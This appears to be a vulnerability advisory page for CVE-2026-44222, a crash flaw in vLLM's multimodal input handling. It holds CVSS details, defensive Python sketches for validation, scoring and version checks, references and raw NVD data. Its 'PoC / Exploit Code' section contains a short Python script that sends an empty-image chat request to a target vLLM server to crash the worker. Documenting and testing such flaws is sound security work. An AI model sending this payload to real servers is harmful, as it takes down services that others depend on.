CVE-2026-44222

Description

vLLM is an inference and serving engine for large language models (LLMs). Versions from 0.6.1 up to, but not including, 0.20.0 contain a token injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. When image or video placeholder sequences are supplied without matching data, vLLM indexes into empty grids during input-position computation, raising an unhandled IndexError that terminates the worker or degrades availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. The vulnerability is fixed in 0.20.0.
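The bug class described above (CWE-129, improper validation of an array index) can be illustrated with a minimal defensive sketch. It is not vLLM's actual code or its fix: the token id, the exception class, and the function names are hypothetical, chosen only to show a count check that runs before any grid is indexed.

```python
from typing import Sequence, Tuple

# Hypothetical placeholder token id, chosen only for this illustration.
IMAGE_PLACEHOLDER_ID = 9001


class PlaceholderMismatchError(ValueError):
    """Raised when placeholder runs and grid entries do not line up."""


def count_placeholder_runs(token_ids: Sequence[int], placeholder_id: int) -> int:
    """Count contiguous runs of the placeholder token in a prompt."""
    runs = 0
    previous = None
    for token in token_ids:
        if token == placeholder_id and previous != placeholder_id:
            runs += 1
        previous = token
    return runs


def validate_grids(
    token_ids: Sequence[int],
    image_grid_thw: Sequence[Tuple[int, int, int]],
) -> None:
    """Reject the request up front instead of indexing into an empty grid list."""
    runs = count_placeholder_runs(token_ids, IMAGE_PLACEHOLDER_ID)
    if runs != len(image_grid_thw):
        raise PlaceholderMismatchError(
            f"{runs} placeholder run(s) but {len(image_grid_thw)} grid entrie(s)"
        )


# One placeholder run with one matching grid entry passes silently.
validate_grids([1, 9001, 9001, 2], [(1, 2, 2)])

# A placeholder with no accompanying data is rejected with a handled error.
try:
    validate_grids([1, 9001, 2], [])
except PlaceholderMismatchError as exc:
    print(f"rejected: {exc}")
```

Raising a dedicated ValueError subclass lets a server map the failure to a client error response rather than letting an IndexError propagate out of the worker.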

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
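As a cross-check, the 6.5 base score can be reproduced from the vector using the CVSS v3.1 base-score equations. The sketch below covers only the Scope: Unchanged case, which is what this vector uses; the function names are illustrative.

```python
import math

# CVSS v3.1 metric weights for the Scope: Unchanged case.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS v3.1 vector with unchanged scope."""
    # Skip the leading "CVSS:3.1" element and split the rest into metric/value pairs.
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    if parts["S"] != "U":
        raise NotImplementedError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][parts[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"))  # 6.5
```

With these weights the impact subscore is about 3.6 and the exploitability subscore about 2.8, which sum to roughly 6.43 and round up to 6.5.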

Configurations (Affected Products)

No configuration data available.

vLLM 0.6.1 up to (but not including) 0.20.0
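To check whether a given release falls inside the affected range, a half-open interval comparison is enough. The sketch below is a minimal illustration with hypothetical helper names. It assumes plain numeric release strings such as "0.19.1", and it raises ValueError on pre-release or local suffixes (for example "0.20.0rc1") rather than guessing.

```python
from typing import Tuple

FIRST_AFFECTED = (0, 6, 1)   # inclusive lower bound
FIRST_FIXED = (0, 20, 0)     # exclusive upper bound


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '0.19.1' into (0, 19, 1); non-numeric parts raise ValueError."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version: str) -> bool:
    """Return True if the version lies in the range 0.6.1 <= v < 0.20.0."""
    return FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED


for candidate in ("0.6.0", "0.6.1", "0.19.1", "0.20.0"):
    print(candidate, is_affected(candidate))
```

Comparing integer tuples avoids the string-comparison trap in which "0.20.0" would sort before "0.6.1".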

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (example)
url = "http://target-vllm-instance:8000/v1/chat/completions"

# Payload containing an image entry with no actual image data.
# This attempts to trigger the IndexError in the multimodal processing path.
# The model name is only an example; the affected paths are the multimodal
# ones that rely on image_grid_thw/video_grid_thw.
payload = {
    "model": "meta-llama/Llama-2-7b-chat-hf",
    "messages": [
        {
            "role": "user",
            "content": [
                {"type": "text", "text": "Analyze this image:"},
                # Image entry with an empty base64 body
                {"type": "image_url", "image_url": {"url": "data:image/jpeg;base64,"}},
            ],
        }
    ],
    "max_tokens": 50,
}

try:
    # json= serializes the payload and sets the Content-Type header
    response = requests.post(url, json=payload, timeout=30)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except requests.RequestException as e:
    print(f"Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44222
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44222
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44222/
[4] VulDB https://vuldb.com/cve/CVE-2026-44222
[5] GitHub Issue https://github.com/vllm-project/vllm/issues/32656
[6] GitHub Security Advisory https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44222", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.160", "lastModified": "2026-05-12T20:16:43.160", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "references": [{"url": "https://github.com/vllm-project/vllm/issues/32656", "source": "[email protected]"}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f", "source": "[email protected]"}]}}